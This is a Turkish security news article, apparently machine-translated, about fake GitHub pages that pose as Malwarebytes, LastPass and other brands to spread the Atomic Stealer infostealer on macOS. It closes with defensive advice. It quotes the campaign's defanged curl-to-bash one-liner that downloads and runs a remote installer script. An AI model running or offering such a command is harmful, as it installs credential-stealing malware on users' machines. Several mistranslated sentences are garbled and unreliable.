Mac kullanıcılarını hedefleyen büyük ölçekli bir kampanya, popüler meşru uygulamalar olarak gizlenmiş bilgi çalma kötü amaçlı yazılımları dağıtmak için sahte GitHub sayfalarından yararlanıyor.
Kişimsiz yazılımlar arasında Mac, LastPass, Citibank, Sentinelone ve diğer tanınmış markaların puanları için Malwarebytes var.
Marka kimliğine bürünme yeni bir şey olmasa da, bu kampanya, siber suçluların kullanıcıları kendileri zararlı kod kurmaya ikna etmek için kullanan gelişen taktikleri gösteriyor.
LastPass Tehdit İstihbarat ve MalwareBebytes’den tehdit araştırmacıları, güvenilir uygulamalar için MacOS yükleyicilerini barındırmayı iddia eden çok sayıda GitHub sayfası belirlediler.
Birkaç durumda, saldırganlar kullanıcıları resmi satıcı siteleri yerine bu kötü amaçlı sayfalara yönlendiren sponsorlu Google reklamları satın alırlar.
Diğer durumlarda, kampanya, “Malwarebytes Github MacOS” gibi sorgular için sahte depoları artırmak için SEO zaferleme tekniklerine dayanmaktadır. Siteye çekildikten sonra, istenmeyen kullanıcılara ” [APPLICATION]” düğme.
Bunu tıklamak, yeni kaydedilmiş bir alandan bir yükleyici komut dosyasını indirip yürüten talimatlara yol açar, genellikle herhangi bir kullanıcı istemi veya kod incelemesi olmadan, MacOS korumalarını ve kullanıcı uyanıklığını etkili bir şekilde atlar.
Bu işlemin amacı, tarayıcı verilerini, pano içeriğini ve depolanan kimlik bilgilerini hasat eden güçlü bir macOS bilgi stealer olan Atomic Stealer’ı (AMOS olarak da bilinir) dağıtmaktır.
Birisi bu düğmeyi tıklarsa, aslında bir bilgi stealer olan sahte ürünün nasıl yükleneceğine dair talimatları içeren bir indirme sayfasına girer.
Hem MAC için Malwarebytes hem de tehdit bayrağı hem de bu varyantı engelliyor, ancak ilk sosyal mühendislik daha az temkinli kullanıcılara karşı şok edici bir şekilde etkili olmaya devam ediyor.
Enfeksiyon zincirinin teknik dökümü
Kurulum işlemi, kullanıcılara MacOS terminaline kopyalayıp yapıştırmaları talimat verildiği tek satırlı bir kabuk komutuna tamamen dayanır:
bash/bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"
İşte böyle çalışıyor:
- .
curl -fsSLSeçenekler, herhangi bir yönlendirmeyi izleyerek ve HTTP hatalarında sessizce başarısız olan uzak bir komut dosyasını sessizce indirin. - Sarmak
curlçağırma$(…)İndirilen komut dosyasının doğrudan dışa geçirilmesine neden olurbash -cemretmek. - Dış kabuk çağrısı, içeriğini inceleme için kullanıcıya sunmadan getirilen komut dosyasını anında çalıştırır.
Saldırganlar, gerçek hedefi gizlemek için Base64’teki ara URL’leri bile kodladı ve gündelik gözlemcilerin algılamasını daha zor hale getirdi.
Terminal yaklaşımı MacOS’un yerleşik uygulama imzalama kontrollerini tetiklemediğinden veya yönetici düzeyinde istemler gerektirmediğinden, komut dosyası kullanıcının ayrıcalıklarıyla yürütülür ve Launchagents veya LaunchDaemons’a kalıcı temsilciler yükleyebilir.
Sahte yazılımdan kaçınmak için en iyi uygulamalar
Bu ve benzer taktiklere karşı korumak için Mac kullanıcıları aşağıdaki yönergeleri benimsemelidir:
Doğrulanmamış web sayfalarından, forumlardan veya GitHub depolarından kopya çekilmiş komutları asla yürütmeyin. Çağıran komutlar curl … | bash veya benzer yapılar yüksek risk olarak ele alınmalıdır.
Her zaman geliştiricinin resmi web sitesinden veya saygın bir App Store’dan uygulamaları indirin. Şüpheniz varsa, doğrudan destek kanalları aracılığıyla satıcı ile URL’leri indirin.
Sponsorlu arama sonuçlarıyla dikkatli olun veya dikkat edin. Bu reklamlar, güvenilir markalar olarak maskelenen kötü amaçlı sayfalara yönlendirebilir.
Web filtreleme içeren gerçek zamanlı antimal yazılım koruması kullanın. MAC için MalwareBebytes ve Tehdit gibi çözümler, kurulumdan önce atomik stealer varyantları algılamak ve engeller.
Bir enfeksiyondan şüpheleniliyorsa, ~/Library/LaunchAgents Ve /Library/LaunchDaemons Bilmediğiniz öğeler için klasörler ve şüpheli girişleri kaldırın.
Kapsamlı iyileştirme için, tam bir macOS yeniden yükleyin ve dosyaları yalnızca bilinen temiz yedeklemelerden geri yükleyin. Tüm hesap şifrelerini yeniden başlatın ve çalınan kimlik bilgileriyle yetkisiz erişimi önlemek için çok faktörlü kimlik doğrulamayı etkinleştirin.
GitHub genellikle açık kaynaklı yazılım için güvenilir bir platform olmasına rağmen, bu kampanya rakiplerin meşru markaları taklit ederek nasıl silahlandırabileceğini göstermektedir.
Dikkat, temkinli indirme uygulamaları ve sağlam uç nokta koruması, bu kadar hızla gelişen tehditlere karşı en iyi savunmalar olmaya devam ediyor.
Anında güncellemeler almak ve GBH’yi Google’da tercih edilen bir kaynak olarak ayarlamak için bizi Google News, LinkedIn ve X’te takip edin.